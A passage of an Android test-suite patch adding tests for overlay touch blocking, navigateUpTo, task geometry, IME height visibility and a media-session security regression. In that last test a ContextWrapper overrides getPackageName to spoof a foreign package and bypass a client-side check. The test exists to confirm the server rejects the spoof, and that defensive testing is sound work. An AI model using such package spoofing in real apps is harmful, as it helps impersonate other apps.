+ Components.TrampolineActivity.buildTrampolineExtra(OVERLAY_IN_DIFFERENT_UID));
+ mWmState.waitAndAssertActivityState(OVERLAY_IN_DIFFERENT_UID, STATE_RESUMED);
+ touchButtonsAndAssert(true /*expectTouchesToReachActivity*/);
+ }
+
+ @Test
+ public void testOverlappingActivitySandwich_BlocksTouches() {
+ Intent intent = new Intent();
+ intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ intent.setComponent(TRAMPOLINE_DIFFERENT_UID);
+ intent.replaceExtras(Components.TrampolineActivity.buildTrampolineExtra(TEST_ACTIVITY,
+ OVERLAY_IN_DIFFERENT_UID));
+ mContext.startActivity(intent);
+
+ mWmState.waitAndAssertActivityState(OVERLAY_IN_DIFFERENT_UID, STATE_RESUMED);
+ touchButtonsAndAssert(false /*expectTouchesToReachActivity*/, false /*waitForAnimation*/);
+
+ mContext.sendBroadcast(new Intent(Components.TranslucentFloatingActivity.ACTION_FINISH));
+ mWmState.waitAndAssertActivityRemoved(OVERLAY_IN_DIFFERENT_UID);
+ touchButtonsAndAssert(true /*expectTouchesToReachActivity*/);
+ }
+
+ @Test
+ public void testOverlappingActivitySandwichDuringAnimation_DoesNotBlockTouches() {
+ Intent intent = new Intent();
+ intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ intent.setComponent(TRAMPOLINE_DIFFERENT_UID);
+ intent.replaceExtras(Components.TrampolineActivity.buildTrampolineExtra(TEST_ACTIVITY,
+ OVERLAY_IN_DIFFERENT_UID));
+ mContext.startActivity(intent);
+
+ mWmState.waitAndAssertActivityState(OVERLAY_IN_DIFFERENT_UID, STATE_RESUMED);
+ touchButtonsAndAssert(false /*expectTouchesToReachActivity*/, false /*waitForAnimation*/);
+
+ int displayId = mWmState.getTaskByActivity(OVERLAY_IN_DIFFERENT_UID).mDisplayId;
+ mContext.sendBroadcast(new Intent(ACTION_FINISH).putExtra(EXTRA_FADE_EXIT, true));
+ assertThat(mWmState.waitForAppTransitionRunningOnDisplay(displayId)).isTrue();
+ touchButtonsAndAssert(true /*expectTouchesToReachActivity*/, false /*waitForAnimation*/);
+ }
+
+ private void launchActivityInSameTask(ComponentName componentName) {
+ launchActivityInSameTask(componentName, null);
+ }
+
+ private void launchActivityInSameTask(ComponentName componentName, @Nullable Bundle extras) {
+ Intent intent = new Intent(ActivityRecordInputSinkTestsActivity.LAUNCH_ACTIVITY_ACTION);
+ intent.putExtra(ActivityRecordInputSinkTestsActivity.COMPONENT_EXTRA, componentName);
+ intent.putExtra(ActivityRecordInputSinkTestsActivity.EXTRA_EXTRA, extras);
+ mContext.sendBroadcast(intent);
+ }
+
+
+ private void touchButtonsAndAssert(boolean expectTouchesToReachActivity) {
+ touchButtonsAndAssert(expectTouchesToReachActivity, true /* waitForAnimation */);
+ }
+
+ private void touchButtonsAndAssert(
+ boolean expectTouchesToReachActivity, boolean waitForAnimation) {
+ int displayId = mWmState.getDisplayByActivity(TEST_ACTIVITY);
+ WindowManagerState.Activity activity = mWmState.getActivity(TEST_ACTIVITY);
+ Rect bounds = activity.getBounds();
+ bounds.offset(0, -bounds.height() / 3);
+ mTouchHelper.tapOnCenter(bounds, displayId, waitForAnimation);
+ mTouchCount += (expectTouchesToReachActivity ? 1 : 0);
+ mInstrumentation.waitForIdleSync();
+ assertThat(ActivityRecordInputSinkTestsActivity.sButtonClickCount.get())
+ .isEqualTo(mTouchCount);
+
+ bounds.offset(0, 2 * bounds.height() / 3);
+ mTouchHelper.tapOnCenter(bounds, displayId, waitForAnimation);
+ mTouchCount += (expectTouchesToReachActivity ? 1 : 0);
+ mInstrumentation.waitForIdleSync();
+ assertThat(ActivityRecordInputSinkTestsActivity.sButtonClickCount.get())
+ .isEqualTo(mTouchCount);
+ }
+
+}
diff --git a/tests/framework/base/windowmanager/src/android/server/wm/ActivityRecordInputSinkTestsActivity.java b/tests/framework/base/windowmanager/src/android/server/wm/ActivityRecordInputSinkTestsActivity.java
new file mode 100644
index 00000000000..2b6b9289223
--- /dev/null
+++ b/tests/framework/base/windowmanager/src/android/server/wm/ActivityRecordInputSinkTestsActivity.java
@@ -0,0 +1,81 @@
+/*
+ * Copyright (C) 2019 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.server.wm;
+
+import android.app.Activity;
+import android.content.BroadcastReceiver;
+import android.content.ComponentName;
+import android.content.Context;
+import android.content.Intent;
+import android.content.IntentFilter;
+import android.os.Bundle;
+import android.widget.Button;
+import android.widget.LinearLayout;
+
+import java.util.concurrent.atomic.AtomicInteger;
+
+public class ActivityRecordInputSinkTestsActivity extends Activity {
+
+ static final String LAUNCH_ACTIVITY_ACTION = "launch";
+ static final String COMPONENT_EXTRA = "component";
+ static final String EXTRA_EXTRA = "extra";
+
+ Button mTopButton;
+ Button mBottomButton;
+
+ static volatile AtomicInteger sButtonClickCount = new AtomicInteger(0);
+
+ @Override
+ protected void onCreate(Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+ mTopButton = new Button(this);
+ mTopButton.setOnClickListener(v -> sButtonClickCount.getAndIncrement());
+ mTopButton.setLayoutParams(
+ new LinearLayout.LayoutParams(LinearLayout.LayoutParams.MATCH_PARENT,
+ LinearLayout.LayoutParams.MATCH_PARENT));
+ setContentView(mTopButton);
+ }
+
+ @Override
+ protected void onStart() {
+ super.onStart();
+ registerReceiver(mReceiver, new IntentFilter(LAUNCH_ACTIVITY_ACTION));
+ }
+
+ @Override
+ protected void onStop() {
+ unregisterReceiver(mReceiver);
+ super.onStop();
+ }
+
+ private final BroadcastReceiver mReceiver = new BroadcastReceiver() {
+ @Override
+ public void onReceive(Context context, Intent intent) {
+ switch (intent.getAction()) {
+ case LAUNCH_ACTIVITY_ACTION:
+ Intent activityIntent = new Intent();
+ activityIntent.setComponent(intent.getParcelableExtra(COMPONENT_EXTRA));
+ activityIntent.replaceExtras(intent.getBundleExtra(EXTRA_EXTRA));
+ startActivity(activityIntent);
+ break;
+ default:
+ throw new AssertionError("Unknown action" + intent.getAction());
+ }
+ }
+ };
+
+}
diff --git a/tests/framework/base/windowmanager/src/android/server/wm/StartActivityTests.java b/tests/framework/base/windowmanager/src/android/server/wm/StartActivityTests.java
index 1ba667290e4..8d668325937 100644
--- a/tests/framework/base/windowmanager/src/android/server/wm/StartActivityTests.java
+++ b/tests/framework/base/windowmanager/src/android/server/wm/StartActivityTests.java
@@ -21,6 +21,7 @@ import static android.app.WindowConfiguration.ACTIVITY_TYPE_DREAM;
import static android.app.WindowConfiguration.ACTIVITY_TYPE_HOME;
import static android.app.WindowConfiguration.ACTIVITY_TYPE_RECENTS;
import static android.app.WindowConfiguration.ACTIVITY_TYPE_STANDARD;
+import static android.content.Intent.FLAG_ACTIVITY_CLEAR_TOP;
import static android.content.Intent.FLAG_ACTIVITY_NEW_DOCUMENT;
import static android.server.wm.WindowManagerState.STATE_INITIALIZING;
import static android.server.wm.WindowManagerState.STATE_STOPPED;
@@ -205,12 +206,23 @@ public class StartActivityTests extends ActivityManagerTestBase {
*/
@Test
public void testStartActivityByNavigateUpToFromDiffUid() {
- final Intent intent1 = new Intent(mContext, Activities.RegularActivity.class);
+ final Intent rootIntent = new Intent(mContext, Activities.RegularActivity.class);
final String regularActivityName = Activities.RegularActivity.class.getName();
final TestActivitySession<Activities.RegularActivity> activitySession1 =
createManagedTestActivitySession();
- activitySession1.launchTestActivityOnDisplaySync(regularActivityName, intent1,
+ activitySession1.launchTestActivityOnDisplaySync(regularActivityName, rootIntent,
DEFAULT_DISPLAY);
+
+ final Intent navIntent = new Intent(mContext, Activities.RegularActivity.class);
+ verifyNavigateUpTo(activitySession1, navIntent);
+
+ navIntent.addFlags(FLAG_ACTIVITY_CLEAR_TOP);
+ verifyNavigateUpTo(activitySession1, navIntent);
+ assertFalse("#onNewIntent cannot be called",
+ activitySession1.getActivity().mIsOnNewIntentCalled);
+ }
+
+ private void verifyNavigateUpTo(TestActivitySession rootActivitySession, Intent navIntent) {
final TestActivitySession<Activities.SingleTopActivity> activitySession2 =
createManagedTestActivitySession();
activitySession2.launchTestActivityOnDisplaySync(Activities.SingleTopActivity.class,
@@ -228,14 +240,14 @@ public class StartActivityTests extends ActivityManagerTestBase {
});
final Bundle data = new Bundle();
- data.putParcelable(EXTRA_INTENT, intent1);
+ data.putParcelable(EXTRA_INTENT, navIntent);
activitySession3.sendCommand(COMMAND_NAVIGATE_UP_TO, data);
- waitAndAssertTopResumedActivity(intent1.getComponent(), DEFAULT_DISPLAY,
- "navigateUpTo should return to the first activity");
+ waitAndAssertTopResumedActivity(rootActivitySession.getActivity().getComponentName(),
+ DEFAULT_DISPLAY, "navigateUpTo should return to the first activity");
// Make sure the resumed first activity is the original instance.
assertFalse("The target of navigateUpTo should not be destroyed",
- activitySession1.getActivity().isDestroyed());
+ rootActivitySession.getActivity().isDestroyed());
// The activities above the first one should be destroyed.
mWmState.waitAndAssertActivityRemoved(
diff --git a/tests/framework/base/windowmanager/src/android/server/wm/intent/Activities.java b/tests/framework/base/windowmanager/src/android/server/wm/intent/Activities.java
index 5dc7ffe1dbd..208d94fc0bd 100644
--- a/tests/framework/base/windowmanager/src/android/server/wm/intent/Activities.java
+++ b/tests/framework/base/windowmanager/src/android/server/wm/intent/Activities.java
@@ -17,6 +17,7 @@
package android.server.wm.intent;
import android.app.Activity;
+import android.content.Intent;
import android.os.Bundle;
/**
@@ -40,6 +41,13 @@ public class Activities {
}
public static class RegularActivity extends BaseActivity {
+ public boolean mIsOnNewIntentCalled = false;
+
+ @Override
+ protected void onNewIntent(Intent intent) {
+ super.onNewIntent(intent);
+ mIsOnNewIntentCalled = true;
+ }
}
public static class SingleTopActivity extends BaseActivity {
diff --git a/tests/framework/base/windowmanager/util/src/android/server/wm/TestTaskOrganizer.java b/tests/framework/base/windowmanager/util/src/android/server/wm/TestTaskOrganizer.java
index bc6090f4bb9..b974ae837b9 100644
--- a/tests/framework/base/windowmanager/util/src/android/server/wm/TestTaskOrganizer.java
+++ b/tests/framework/base/windowmanager/util/src/android/server/wm/TestTaskOrganizer.java
@@ -20,12 +20,14 @@ import static android.app.WindowConfiguration.ACTIVITY_TYPE_HOME;
import static android.app.WindowConfiguration.ACTIVITY_TYPE_RECENTS;
import static android.app.WindowConfiguration.ACTIVITY_TYPE_STANDARD;
import static android.app.WindowConfiguration.ACTIVITY_TYPE_UNDEFINED;
+import static android.app.WindowConfiguration.WINDOWING_MODE_FREEFORM;
import static android.app.WindowConfiguration.WINDOWING_MODE_FULLSCREEN;
import static android.app.WindowConfiguration.WINDOWING_MODE_MULTI_WINDOW;
import static android.app.WindowConfiguration.WINDOWING_MODE_UNDEFINED;
import static android.view.Display.DEFAULT_DISPLAY;
import android.app.ActivityManager;
+import android.app.WindowConfiguration;
import android.content.Context;
import android.graphics.Rect;
import android.hardware.display.DisplayManager;
@@ -61,6 +63,7 @@ public class TestTaskOrganizer extends TaskOrganizer {
private IBinder mPrimaryCookie;
private IBinder mSecondaryCookie;
private final HashMap<Integer, ActivityManager.RunningTaskInfo> mKnownTasks = new HashMap<>();
+ private final HashMap<Integer, SurfaceControl> mTaskLeashes = new HashMap<>();
private final ArraySet<Integer> mPrimaryChildrenTaskIds = new ArraySet<>();
private final ArraySet<Integer> mSecondaryChildrenTaskIds = new ArraySet<>();
private final Rect mPrimaryBounds = new Rect();
@@ -356,7 +359,11 @@ public class TestTaskOrganizer extends TaskOrganizer {
@Override
public void onTaskInfoChanged(ActivityManager.RunningTaskInfo taskInfo) {
synchronized (this) {
- notifyOnEnd(() -> addTask(taskInfo));
+ notifyOnEnd(() -> {
+ SurfaceControl.Transaction t = new SurfaceControl.Transaction();
+ addTask(taskInfo, null /* leash */, t);
+ t.apply();
+ });
}
}
@@ -367,14 +374,26 @@ public class TestTaskOrganizer extends TaskOrganizer {
private void addTask(ActivityManager.RunningTaskInfo taskInfo, SurfaceControl leash,
SurfaceControl.Transaction t) {
mKnownTasks.put(taskInfo.taskId, taskInfo);
- if (taskInfo.hasParentTask()){
+ if (leash != null) {
+ mTaskLeashes.put(taskInfo.taskId, leash);
+ } else {
+ leash = mTaskLeashes.get(taskInfo.taskId);
+ }
+ if (taskInfo.hasParentTask()) {
+ Rect sourceCrop = null;
if (mRootPrimary != null
&& mRootPrimary.taskId == taskInfo.getParentTaskId()) {
+ sourceCrop = new Rect(mPrimaryBounds);
mPrimaryChildrenTaskIds.add(taskInfo.taskId);
} else if (mRootSecondary != null
&& mRootSecondary.taskId == taskInfo.getParentTaskId()) {
+ sourceCrop = new Rect(mSecondaryBounds);
mSecondaryChildrenTaskIds.add(taskInfo.taskId);
}
+ if (t != null && leash != null && sourceCrop != null) {
+ sourceCrop.offsetTo(0, 0);
+ t.setGeometry(leash, sourceCrop, sourceCrop, Surface.ROTATION_0);
+ }
return;
}
@@ -383,7 +402,9 @@ public class TestTaskOrganizer extends TaskOrganizer {
&& taskInfo.containsLaunchCookie(mPrimaryCookie)) {
mRootPrimary = taskInfo;
if (t != null && leash != null) {
- t.setGeometry(leash, null, mPrimaryBounds, Surface.ROTATION_0);
+ Rect sourceCrop = new Rect(mPrimaryBounds);
+ sourceCrop.offsetTo(0, 0);
+ t.setGeometry(leash, sourceCrop, mPrimaryBounds, Surface.ROTATION_0);
}
return;
}
@@ -393,9 +414,24 @@ public class TestTaskOrganizer extends TaskOrganizer {
&& taskInfo.containsLaunchCookie(mSecondaryCookie)) {
mRootSecondary = taskInfo;
if (t != null && leash != null) {
- t.setGeometry(leash, null, mSecondaryBounds, Surface.ROTATION_0);
+ Rect sourceCrop = new Rect(mSecondaryBounds);
+ sourceCrop.offsetTo(0, 0);
+ t.setGeometry(leash, sourceCrop, mSecondaryBounds, Surface.ROTATION_0);
}
+ return;
+ }
+
+ if (t == null || leash == null) {
+ return;
+ }
+ WindowConfiguration config = taskInfo.getConfiguration().windowConfiguration;
+ Rect bounds = config.getBounds();
+ Rect sourceCrop = null;
+ if (config.getWindowingMode() != WINDOWING_MODE_FULLSCREEN) {
+ sourceCrop = new Rect(bounds);
+ sourceCrop.offsetTo(0, 0);
}
+ t.setGeometry(leash, sourceCrop, bounds, Surface.ROTATION_0);
}
private void removeTask(ActivityManager.RunningTaskInfo taskInfo) {
@@ -404,6 +440,7 @@ public class TestTaskOrganizer extends TaskOrganizer {
if (mKnownTasks.remove(taskId) == null) {
return;
}
+ mTaskLeashes.remove(taskId);
mPrimaryChildrenTaskIds.remove(taskId);
mSecondaryChildrenTaskIds.remove(taskId);
diff --git a/tests/framework/base/windowmanager/util/src/android/server/wm/TouchHelper.java b/tests/framework/base/windowmanager/util/src/android/server/wm/TouchHelper.java
index 98183d43e77..327730a33e7 100644
--- a/tests/framework/base/windowmanager/util/src/android/server/wm/TouchHelper.java
+++ b/tests/framework/base/windowmanager/util/src/android/server/wm/TouchHelper.java
@@ -101,9 +101,13 @@ public class TouchHelper {
}
public void tapOnCenter(Rect bounds, int displayId) {
+ tapOnCenter(bounds, displayId, true /* waitAnimation */);
+ }
+
+ public void tapOnCenter(Rect bounds, int displayId, boolean waitAnimation) {
final int tapX = bounds.left + bounds.width() / 2;
final int tapY = bounds.top + bounds.height() / 2;
- tapOnDisplaySync(tapX, tapY, displayId);
+ tapOnDisplay(tapX, tapY, displayId, true /* sync */, waitAnimation);
}
public void tapOnViewCenter(View view) {
diff --git a/tests/framework/base/windowmanager/util/src/android/server/wm/WindowManagerStateHelper.java b/tests/framework/base/windowmanager/util/src/android/server/wm/WindowManagerStateHelper.java
index 458d7857461..e5621dd332e 100644
--- a/tests/framework/base/windowmanager/util/src/android/server/wm/WindowManagerStateHelper.java
+++ b/tests/framework/base/windowmanager/util/src/android/server/wm/WindowManagerStateHelper.java
@@ -228,11 +228,15 @@ public class WindowManagerStateHelper extends WindowManagerState {
waitForWithAmState(state -> !state.isDisplayFrozen(), "Display unfrozen");
}
- public void waitForActivityState(ComponentName activityName, String activityState) {
- waitForWithAmState(state -> state.hasActivityState(activityName, activityState),
+ public boolean waitForActivityState(ComponentName activityName, String activityState) {
+ return waitForWithAmState(state -> state.hasActivityState(activityName, activityState),
"state of " + getActivityName(activityName) + " to be " + activityState);
}
+ public void waitAndAssertActivityState(ComponentName activityName, String activityState) {
+ assertTrue(waitForActivityState(activityName, activityState));
+ }
+
public void waitForActivityRemoved(ComponentName activityName) {
waitFor((amState) -> !amState.containsActivity(activityName)
&& !amState.containsWindow(getWindowName(activityName)),
diff --git a/tests/inputmethod/src/android/view/inputmethod/cts/InputMethodManagerTest.java b/tests/inputmethod/src/android/view/inputmethod/cts/InputMethodManagerTest.java
index 5eaa32ed205..0036da31a6c 100644
--- a/tests/inputmethod/src/android/view/inputmethod/cts/InputMethodManagerTest.java
+++ b/tests/inputmethod/src/android/view/inputmethod/cts/InputMethodManagerTest.java
@@ -18,12 +18,14 @@ package android.view.inputmethod.cts;
import static android.content.Intent.ACTION_CLOSE_SYSTEM_DIALOGS;
import static android.content.Intent.FLAG_RECEIVER_FOREGROUND;
+import static android.view.inputmethod.cts.util.InputMethodVisibilityVerifier.expectImeVisible;
import static android.view.inputmethod.cts.util.TestUtils.waitOnMainUntil;
import static com.android.compatibility.common.util.SystemUtil.runShellCommand;
import static com.google.common.truth.Truth.assertThat;
+import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertFalse;
import static org.junit.Assert.assertNotNull;
import static org.junit.Assert.assertTrue;
@@ -42,6 +44,7 @@ import android.view.inputmethod.InputConnection;
import android.view.inputmethod.InputMethodInfo;
import android.view.inputmethod.InputMethodManager;
import android.view.inputmethod.InputMethodSubtype;
+import android.view.inputmethod.cts.util.MockTestActivityUtil;
import android.view.inputmethod.cts.util.TestActivity;
import android.widget.EditText;
import android.widget.LinearLayout;
@@ -55,7 +58,11 @@ import androidx.test.uiautomator.By;
import androidx.test.uiautomator.UiDevice;
import androidx.test.uiautomator.Until;
+import com.android.cts.mockime.ImeSettings;
+import com.android.cts.mockime.MockImeSession;
+
import org.junit.After;
+import org.junit.AssumptionViolatedException;
import org.junit.Before;
import org.junit.Test;
import org.junit.runner.RunWith;
@@ -171,6 +178,32 @@ public class InputMethodManagerTest {
assertThat(enabledImeIds).contains(HIDDEN_FROM_PICKER_IME_ID);
}
+ @Test
+ public void getInputMethodWindowVisibleHeight_returnsZeroIfNotFocused() throws Exception {
+ InputMethodManager imm = mContext.getSystemService(InputMethodManager.class);
+ try (MockImeSession session = MockImeSession.create(mContext,
+ mInstrumentation.getUiAutomation(), new ImeSettings.Builder())) {
+ try (AutoCloseable closeable = MockTestActivityUtil.launchSync(
+ mContext.getPackageManager().isInstantApp(), TIMEOUT)) {
+ session.callRequestShowSelf(0);
+ expectImeVisible(TIMEOUT);
+ assertEquals("Only IME target UID may observe the visible height of the IME", 0,
+ reflectivelyGetInputMethodWindowVisibleHeight(imm));
+ }
+ }
+ }
+
+ private int reflectivelyGetInputMethodWindowVisibleHeight(InputMethodManager imm)
+ throws Exception {
+ try {
+ return (int) InputMethodManager.class
+ .getMethod("getInputMethodWindowVisibleHeight")
+ .invoke(imm);
+ } catch (NoSuchMethodError e) {
+ throw new AssumptionViolatedException("getInputMethodWindowVisibleHeight not found");
+ }
+ }
+
private static String dumpInputMethodInfoList(@NonNull List<InputMethodInfo> imiList) {
return "[" + imiList.stream().map(imi -> {
final StringBuilder sb = new StringBuilder();
diff --git a/tests/inputmethod/src/android/view/inputmethod/cts/util/MockTestActivityUtil.java b/tests/inputmethod/src/android/view/inputmethod/cts/util/MockTestActivityUtil.java
new file mode 100644
index 00000000000..18f98f148dc
--- /dev/null
+++ b/tests/inputmethod/src/android/view/inputmethod/cts/util/MockTestActivityUtil.java
@@ -0,0 +1,171 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.view.inputmethod.cts.util;
+
+import static android.content.Intent.FLAG_RECEIVER_VISIBLE_TO_INSTANT_APPS;
+
+import static com.android.compatibility.common.util.SystemUtil.runShellCommand;
+import static com.android.compatibility.common.util.SystemUtil.runWithShellPermissionIdentity;
+
+import android.content.ComponentName;
+import android.content.Intent;
+import android.net.Uri;
+
+import androidx.annotation.NonNull;
+import androidx.annotation.Nullable;
+import androidx.test.platform.app.InstrumentationRegistry;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.BySelector;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.Until;
+
+import java.util.Map;
+
+/**
+ * Provides constants and utility methods to interact with
+ * {@link android.view.inputmethod.ctstestapp.MainActivity}.
+ */
+public final class MockTestActivityUtil {
+ private static final ComponentName TEST_ACTIVITY = new ComponentName(
+ "android.view.inputmethod.ctstestapp",
+ "android.view.inputmethod.ctstestapp.MainActivity");
+ private static final Uri TEST_ACTIVITY_URI =
+ Uri.parse("https://example.com/android/view/inputmethod/ctstestapp");
+
+ private static final String ACTION_TRIGGER = "broadcast_action_trigger";
+
+ /**
+ * A key to be used as the {@code key} of {@link Map} passed as {@code extras} parameter of
+ * {@link #launchSync(boolean, long, Map)}.
+ *
+ * <p>A valid {@code value} is either {@code "true"} or {@code "false"}.</p>
+ */
+ public static final String EXTRA_KEY_SHOW_DIALOG =
+ "android.view.inputmethod.ctstestapp.EXTRA_KEY_SHOW_DIALOG";
+
+ /**
+ * A key to be used as the {@code key} of {@link Map} passed as {@code extras} parameter of
+ * {@link #launchSync(boolean, long, Map)}.
+ *
+ * <p>The specified {@code value} will be set to
+ * {@link android.view.inputmethod.EditorInfo#privateImeOptions}.</p>
+ */
+ public static final String EXTRA_KEY_PRIVATE_IME_OPTIONS =
+ "android.view.inputmethod.ctstestapp.EXTRA_KEY_PRIVATE_IME_OPTIONS";
+
+ /**
+ * Can be passed to {@link #sendBroadcastAction(String)} to dismiss the dialog box if exists.
+ */
+ public static final String EXTRA_DISMISS_DIALOG = "extra_dismiss_dialog";
+
+ /**
+ * Can be passed to {@link #sendBroadcastAction(String)} call
+ * {@link android.view.inputmethod.InputMethodManager#showSoftInput(android.view.View, int)}.
+ */
+ public static final String EXTRA_SHOW_SOFT_INPUT = "extra_show_soft_input";
+
+ @NonNull
+ private static Uri formatStringIntentParam(@NonNull Uri uri, Map<String, String> extras) {
+ if (extras == null) {
+ return uri;
+ }
+ final Uri.Builder builder = uri.buildUpon();
+ extras.forEach(builder::appendQueryParameter);
+ return builder.build();
+ }
+
+ /**
+ * Launches {@link "android.view.inputmethod.ctstestapp.MainActivity"}.
+ *
+ * @param instant {@code true} when the Activity is installed as an instant app.
+ * @param timeout the timeout to wait until the Activity becomes ready.
+ * @return {@link AutoCloseable} object to automatically stop the test Activity package.
+ */
+ public static AutoCloseable launchSync(boolean instant, long timeout) {
+ return launchSync(instant, timeout, null);
+ }
+
+ /**
+ * Launches {@link "android.view.inputmethod.ctstestapp.MainActivity"}.
+ *
+ * @param instant {@code true} when the Activity is installed as an instant app.
+ * @param timeout the timeout to wait until the Activity becomes ready.
+ * @param extras extra parameters to be passed to the Activity.
+ * @return {@link AutoCloseable} object to automatically stop the test Activity package.
+ */
+ public static AutoCloseable launchSync(boolean instant, long timeout,
+ @Nullable Map<String, String> extras) {
+ final StringBuilder commandBuilder = new StringBuilder();
+ if (instant) {
+ // Override app-links domain verification.
+ runShellCommand(
+ String.format("pm set-app-links-user-selection --user cur --package %s true %s",
+ TEST_ACTIVITY.getPackageName(), TEST_ACTIVITY_URI.getHost()));
+ final Uri uri = formatStringIntentParam(TEST_ACTIVITY_URI, extras);
+ commandBuilder.append(String.format("am start -a %s -c %s --activity-clear-task %s",
+ Intent.ACTION_VIEW, Intent.CATEGORY_BROWSABLE, uri.toString()));
+ } else {
+ commandBuilder.append("am start --activity-clear-task -n ")
+ .append(TEST_ACTIVITY.flattenToShortString());
+ if (extras != null) {
+ extras.forEach((key, value) -> commandBuilder.append(" --es ")
+ .append(key).append(" ").append(value));
+ }
+ }
+
+ runWithShellPermissionIdentity(() -> {
+ runShellCommand(commandBuilder.toString());
+ });
+ UiDevice uiDevice = UiDevice.getInstance(InstrumentationRegistry.getInstrumentation());
+ BySelector activitySelector = By.pkg(TEST_ACTIVITY.getPackageName()).depth(0);
+ uiDevice.wait(Until.hasObject(activitySelector), timeout);
+
+ // Make sure to stop package after test finished for resource reclaim.
+ return () -> TestUtils.forceStopPackage(TEST_ACTIVITY.getPackageName());
+ }
+
+ /**
+ * Sends a broadcast to {@link "android.view.inputmethod.ctstestapp.MainActivity"}.
+ *
+ * @param extra {@link #EXTRA_DISMISS_DIALOG} or {@link #EXTRA_SHOW_SOFT_INPUT}.
+ */
+ public static void sendBroadcastAction(String extra) {
+ final StringBuilder commandBuilder = new StringBuilder();
+ commandBuilder.append("am broadcast -a ").append(ACTION_TRIGGER).append(" -p ").append(
+ TEST_ACTIVITY.getPackageName());
+ commandBuilder.append(" -f 0x").append(
+ Integer.toHexString(FLAG_RECEIVER_VISIBLE_TO_INSTANT_APPS));
+ commandBuilder.append(" --ez " + extra + " true");
+ runWithShellPermissionIdentity(() -> {
+ runShellCommand(commandBuilder.toString());
+ });
+ }
+
+ /**
+ * Force-stops {@link "android.view.inputmethod.ctstestapp"} package.
+ */
+ public static void forceStopPackage() {
+ TestUtils.forceStopPackage(TEST_ACTIVITY.getPackageName());
+ }
+
+ /**
+ * @return {@code "android.view.inputmethod.ctstestapp"}.
+ */
+ public static String getPackageName() {
+ return TEST_ACTIVITY.getPackageName();
+ }
+}
diff --git a/tests/location/location_fine/src/android/location/cts/fine/LocationManagerFineTest.java b/tests/location/location_fine/src/android/location/cts/fine/LocationManagerFineTest.java
index d4d8d6c0d9d..7d97a70ff0a 100644
--- a/tests/location/location_fine/src/android/location/cts/fine/LocationManagerFineTest.java
+++ b/tests/location/location_fine/src/android/location/cts/fine/LocationManagerFineTest.java
@@ -827,6 +827,7 @@ public class LocationManagerFineTest {
}
@Test
+ @AppModeFull(reason = "Instant apps can't hold INTERACT_ACROSS_USERS permission")
public void testAddProviderRequestListener() throws Exception {
InstrumentationRegistry.getInstrumentation().getUiAutomation()
.adoptShellPermissionIdentity(Manifest.permission.LOCATION_HARDWARE);
diff --git a/tests/tests/media/Android.bp b/tests/tests/media/Android.bp
index 61a25966220..fccba68938b 100644
--- a/tests/tests/media/Android.bp
+++ b/tests/tests/media/Android.bp
@@ -96,6 +96,7 @@ android_test {
"cts",
"general-tests",
"mts-media",
+ "sts",
],
host_required: ["cts-dynamic-config"],
min_sdk_version: "29",
diff --git a/tests/tests/media/src/android/media/cts/MediaSessionTest.java b/tests/tests/media/src/android/media/cts/MediaSessionTest.java
index 016c9ba01c1..3e54306c062 100644
--- a/tests/tests/media/src/android/media/cts/MediaSessionTest.java
+++ b/tests/tests/media/src/android/media/cts/MediaSessionTest.java
@@ -29,6 +29,7 @@ import static android.media.cts.Utils.compareRemoteUserInfo;
import android.app.PendingIntent;
import android.content.ComponentName;
import android.content.Context;
+import android.content.ContextWrapper;
import android.content.Intent;
import android.media.AudioAttributes;
import android.media.AudioManager;
@@ -49,6 +50,7 @@ import android.os.Looper;
import android.os.Parcel;
import android.os.Process;
import android.platform.test.annotations.AppModeFull;
+import android.platform.test.annotations.AsbSecurityTest;
import android.test.AndroidTestCase;
import android.text.TextUtils;
import android.view.KeyEvent;
@@ -78,6 +80,11 @@ public class MediaSessionTest extends AndroidTestCase {
private static final long TEST_ACTION = 55L;
private static final int TEST_TOO_MANY_SESSION_COUNT = 1000;
+ private static final String TEST_SESSION_TAG_FOREIGN_PACKAGE =
+ "test-session-tag-foreign-package";
+ private static final String TEST_FOREIGN_PACKAGE_NAME = "fakepackage";
+ private static final String TEST_FOREIGN_PACKAGE_CLASS = "com.fakepackage.media.FakeReceiver";
+
private AudioManager mAudioManager;
private Handler mHandler = new Handler(Looper.getMainLooper());
private Object mWaitLock = new Object();
@@ -305,6 +312,46 @@ public class MediaSessionTest extends AndroidTestCase {
}
}
+ @AsbSecurityTest(cveBugId = 238177121)
+ public void testSetMediaButtonBroadcastReceiver_withForeignPackageName_fails()
+ throws Exception {
+ Utils.assertMediaPlaybackStarted(getContext());
+
+ // Create Media Session
+ MyContextWrapper contextWrapper = new MyContextWrapper(getContext());
+ MediaSession mediaSession =
+ new MediaSession(contextWrapper, TEST_SESSION_TAG_FOREIGN_PACKAGE);
+
+ // Bypass client-side check
+ contextWrapper.mOverridePackageName = TEST_FOREIGN_PACKAGE_NAME;
+
+ try {
+ mediaSession.setMediaButtonBroadcastReceiver(
+ new ComponentName(TEST_FOREIGN_PACKAGE_NAME, TEST_FOREIGN_PACKAGE_CLASS));
+ fail("Component name with different package name was registered.");
+ } catch (IllegalArgumentException ex) {
+ // Expected.
+ } finally {
+ mediaSession.release();
+ }
+ }
+
+ static class MyContextWrapper extends ContextWrapper {
+ String mOverridePackageName;
+
+ MyContextWrapper(Context base) {
+ super(base);
+ }
+
+ @Override
+ public String getPackageName() {
